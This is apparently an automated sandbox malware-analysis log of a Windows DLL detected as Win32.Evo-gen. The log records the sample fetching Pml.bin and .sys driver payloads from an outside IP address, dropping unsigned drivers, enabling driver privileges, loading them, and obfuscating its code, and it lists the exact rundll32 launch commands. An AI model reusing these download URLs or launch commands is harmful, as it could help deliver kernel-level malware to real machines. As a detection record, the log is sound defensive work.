00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09F851 InternetReadFile, 3_2_6E09F851
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1Host: 134.175.236.132:17598Cache-Control: no-cache
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.1
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132/
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:1
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2083353565.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000090A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2055035167.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2054642510.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.bin
Source: rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binA
Source: rundll32.exe, 00000003.00000002.2082938982.000000000090A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binLocal
Source: rundll32.exe, 00000003.00000002.2083353565.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2055035167.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binhttp://134.175.236.132:17598/xz?mz=PmlHousPro.sys
Source: rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binit
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sys
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sys$
Source: rundll32.exe, 00000006.00000002.2125120908.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysB
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysD
Source: rundll32.exe, 00000006.00000002.2125120908.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysH
Source: rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysP
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysn
Source: rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.syss
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sys~
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000716000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2055035167.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2054642510.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys
Source: rundll32.exe, 00000003.00000003.2039142851.000000000095E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys0ad
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys8)
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys;
Source: rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysDvT
Source: rundll32.exe, 00000003.00000003.2039142851.000000000095E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysHa
Source: rundll32.exe, 00000003.00000003.2039142851.000000000095E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysX
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysk
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:1HvP
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:1p8
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://subca.ocsp-certum.com02
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: https://www.certum.pl/CPS0
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09793A NtLoadDriver, 3_2_6E09793A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09D686 NtQuerySystemInformation, 3_2_6E09D686
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E098887 NtQuerySystemInformation, 3_2_6E098887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09791B NtLoadDriver, 3_2_6E09791B
Contains functionality to load drivers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09793A NtLoadDriver, 3_2_6E09793A
Creates driver files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341015D.sys Jump to behavior
Enables driver privileges
Source: C:\Windows\SysWOW64\rundll32.exe Process token adjusted: Load Driver Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E095950 appears 33 times
Spawns drivers
Source: C:\Windows\SysWOW64\rundll32.exe Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\1341001C Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine Classification label: mal96.troj.evad.winDLL@10/13@0/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09C55F AdjustTokenPrivileges, 3_2_6E09C55F
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xz[1] Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341026E.bin Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll,InsterDriver
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Virustotal: Detection: 23%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll,InsterDriver
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",InsterDriver
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll,InsterDriver Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",InsterDriver Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains an invalid checksum
Source: xz[2]0.4.dr Static PE information: real checksum: 0x24130 should be: 0x2390b
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: real checksum: 0x0 should be: 0x18441
Source: xz[1].3.dr Static PE information: real checksum: 0x24130 should be: 0x2390b
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: section name: .Pml0
Source: 1341015D.sys.3.dr Static PE information: section name: .VSK0
Source: xz[1].3.dr Static PE information: section name: .VSK0
Source: xz[1]0.3.dr Static PE information: section name: .VSK0
Source: xz[1]1.3.dr Static PE information: section name: .VSK0
Source: 1340820F.sys.4.dr Static PE information: section name: .VSK0
Source: xz[2]0.4.dr Static PE information: section name: .VSK0
Source: xz[2]1.4.dr Static PE information: section name: .VSK0
Source: 7ECA49D7.sys.6.dr Static PE information: section name: .VSK0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E0996E4 push dword ptr [esp+28h]; retn 002Ch 3_2_6E099708
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09870B push dword ptr [esp+40h]; retn 0044h 3_2_6E09D99B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09EC45 push 17D028D3h; mov dword ptr [esp], eax 3_2_6E09ECAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09EDA1 push dword ptr [esp+50h]; retn 0054h 3_2_6E09EDF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09B252 push dword ptr [esp+24h]; retn 0028h 3_2_6E09C6EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09CA54 push dword ptr [esp+48h]; retn 004Ch 3_2_6E09BD3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09CA54 push dword ptr [esp+50h]; retn 0054h 3_2_6E09DB02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E0958B1 pushfd ; mov dword ptr [esp], eax 3_2_6E09A11D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09793A pushfd ; mov dword ptr [esp], 6E09CC17h 3_2_6E09DCE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09518F push ABF4F956h; mov dword ptr [esp], edx 3_2_6E09523F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09CE09 push dword ptr [esp+30h]; retn 0034h 3_2_6E09CE3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09A60B push dword ptr [esp+04h]; retn 0008h 3_2_6E09A61B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09B60F push 41910BC5h; mov dword ptr [esp], ecx 3_2_6E09BB8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E04 push dword ptr [esp+20h]; retn 0024h 3_2_6E096D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09EE06 push dword ptr [esp+44h]; retn 0048h 3_2_6E09EE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E098E1F push dword ptr [esp+4Ch]; retn 0050h 3_2_6E09AA8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E096E1E push dword ptr [esp+50h]; retn 0054h 3_2_6E096E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E099E17 push dword ptr [esp+44h]; retn 0048h 3_2_6E098F09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E099E17 push dword ptr [esp+3Ch]; retn 0040h 3_2_6E09D595
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09D616 push dword ptr [esp+24h]; retn 0028h 3_2_6E09B29C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09862D push dword ptr [esp+0Ch]; retn 0010h 3_2_6E098644
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09762E push dword ptr [esp+28h]; retn 0060h 3_2_6E0991C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09B623 push 41910BC5h; mov dword ptr [esp], ecx 3_2_6E09BB8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E096E1E push dword ptr [esp+50h]; retn 0054h 3_2_6E096E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E097E3D push dword ptr [esp+28h]; retn 002Ch 3_2_6E097E49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E099633 push dword ptr [esp+28h]; retn 002Ch 3_2_6E09964B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09964E push dword ptr [esp+2Ch]; retn 0030h 3_2_6E09C8CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E45 push EE29E32Dh; mov dword ptr [esp], eax 3_2_6E091F36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09E644 push dword ptr [esp+50h]; retn 0054h 3_2_6E09E657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09665B push dword ptr [esp+38h]; retn 003Ch 3_2_6E096676
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09C65B push dword ptr [esp+04h]; retn 0008h 3_2_6E09C683
Source: 1341015D.sys.3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[1].3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[1]0.3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[1]1.3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: 1340820F.sys.4.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[2]0.4.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[2]1.4.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: 7ECA49D7.sys.6.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341015D.sys Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341015D.sys Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1340820F.sys Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1340820F.sys Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys Jump to behavior
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys Jump to dropped file
